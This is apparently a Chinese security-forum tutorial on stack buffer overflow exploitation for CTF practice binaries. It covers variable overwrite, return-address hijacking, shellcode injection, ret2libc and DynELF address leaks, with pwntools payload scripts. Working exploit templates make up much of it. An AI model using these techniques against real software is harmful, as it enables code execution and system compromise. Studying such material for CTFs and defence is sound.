-
-
【干货分享】表哥亲自传授 bof 秘笈,快收藏!
-
发表于: 2020-8-6 11:24 1877
-
今天的文章是i春秋论坛作家「HAI_」表哥原创的一篇关于bof的学习攻略,他把学习过程中感悟与心得分享给需要的小伙伴,感兴趣的童鞋快来学习吧!
分类
1、数据覆盖;
2、返回地址函数跳转;
3、函数覆盖调用;
4、函数构造;
5、off计算以及bss数据写入。
数据覆盖
先来解释一下数据覆盖是指什么,这里是说,通过溢出来覆写其他位置的数据,达到某种效果。一般题目比较常见的就是更改逻辑判断。
溢出有一个东西是不变的,就是你既然要溢出,那么必然要写满才能溢出。
那么如果判断是bof的话,第一步找到溢出点,第二步就是用无用的数据填满。
公式:
payload=需要覆盖垃圾数据的量+需要覆写的内容
需要覆盖垃圾数据的量=待覆盖变量地址-溢出变量地址
整理一下就是payload=待覆盖变量地址-溢出变量地址+需要覆写的内容
那么按照这样子的逻辑我们来看一个例子:
汇编看不懂没关系,F5也行,前期不要求。
这里可以看到我们溢出点在get上,并且需要用s去覆盖a1,那么按照公式:
待覆盖变量地址=ebp+arg_0=ebp+8
溢出变量地址=ebp-2Ch
需要覆盖垃圾数据的量=待覆盖变量地址-溢出变量地址=ebp+8-ebp-2Ch=8+2ch=34
需要覆写的内容=0xCAFEBABE
payload=34个垃圾数据+0xCAFEBABE
这里使用pwntools进行payload的生成,自己写也没问题。
from pwn import * payload=0x34*'A'+p32(0xCAFEBABE)print(payload)
返回地址函数跳转
1、目标提供了system函数
这里就是说覆盖地址把返回地址之前的内容都覆盖完了,那么这里就获得了返回地址的覆写权,也可以说是操作权。
一般什么时候会用到这个东西呢,比如说,这个程序有一个方法,但是在却没有进行调用,我们就可以通过控制返回地址来达到覆写执行的目录。
可以简单的理解为 就是执行了一个 goto跳转。
公式:
payload=覆写垃圾数据+返回地址的值
这里也来举一个例子:
这里可以看到一个good_gaem函数。
可以看到是读取了一个flag.txt的文件。
按照公式我们来找:
覆写垃圾数据=0x88
返回地址的值=0x400620
那最后的payload=0x88*'A'+0x400620
这里还是使用pwntools来进行payload的生成
from pwn import * payload=0x88*'A'+p64(0x400620)print(payload)
2、目标没有提供system,需要自己写shellcode。
这里就是说nx没有开启保护的情况下,就可以自己来进行shellcode的编写,一般可以写shellcode要求填充数据的位置要够。
公式:
payload=shellcode+(垃圾填充长度-shellcode长度)的垃圾数据+返回地址(shellcode)的地址
还是举个例子:
这里可以看到是read导致的溢出。
然后这里看到打印了地址:
效果大概是这样:
那么我们还是按照公式来找,首先是填充字段=0x88。
返回地址需要进行动态截取,就需要使用pwntools进行,shellcode也是用pwntools生成,真的是十分方便。
from pwn import * sh = process("./lx3") shellcode = asm(shellcraft.i386.linux.sh()) line = sh.recvline()[14:-2] buf_addr = int(line,16) payload = shellcode + 'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr) sh.send(payload) sh.interactive() sh.close()
函数覆盖调用
这里是指,在没有函数让我们进行goto跳转也就是操作返回地址的时候,就需要对函数进行主动的调用。
公式:
payload=覆盖垃圾地址+覆盖返回地址+函数地址+返回地址+参数1+参数2...
这里来看一个实例:
还是read的溢出点
覆盖垃圾地址=0x88
这里返回地址直接随便填就行
覆盖返回地址='A'*4
函数地址=0x0804824B
函数地址我们ida shift+f12 看一下string
这里返回地址如果没有要执行下一步的话,直接返回垃圾数据就行。
返回地址='A'*4,参数1=/bin/sh=0x0804A024。
至此我们payload是构造出来了。
写脚本即可:
from pwn import * payload=0x88*'A'+0x4*'A'+p32(0x08048320)+0x4*'A'+p32(0x0804A024)print(payload)
函数构造
上面说了函数覆盖调用,这里来说函数构造,指目标本身不包含system等命令的时候,我们需要从别的地方下手。
我们选择从lib so库中下手,获取system等地址。
公式:(公式和函数覆盖调用一致,只是获取方式不同)
payload=覆盖垃圾地址+覆盖返回地址+函数地址+返回地址+参数1+参数2...
举个例子:
还是read溢出,我们开始找公式内的内容。
覆盖垃圾地址=0x88
覆盖返回地址=0x4
这里找函数地址,找函数地址前,先找基址,这里可以看到基址为0xf7ce8000
system函数地址:0x000426e0
/bin/sh 参数1:
最后就可以组成payload了,构造方法参考上面内容。
off计算以及bss数据写入
有一种情况就是说,没有so库,并且也没有办法获取到在线目标so库的内容,那么就需要通过write去找基址。
公式:(公式还是这个)
payload=覆盖垃圾地址+覆盖返回地址+函数地址+返回地址+参数1+参数2...
可以继续用上面的例子,这里使用pwntools的DynELF获取到system地址。
def leak(address): payload=junk+p32(write_addr)+p32(start_addr)+p32(1)+p32(address)+p32(4) p.sendline(payload) leak_addr=p.recv() return leak_addr d = DynELF(leak,elf=ELF("./lx2")) system_addr = d.lookup('system','libc')
通过DynELF方式可以获取到system的地址。
然后还需要将我们的/bin/sh加载到bss上去,这里需要使用read方法:
payload2='a'*(0x88+0x04)+p32(read_plt)+p32(start_addr)+p32(0)+p32(bss_addr)+p32(8) p.send('/bin/sh\x00')
这样就可以将/bin/sh写到bss字段中,最后构造成payload。
以上是今天要分享的内容,大家看懂了吗?
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课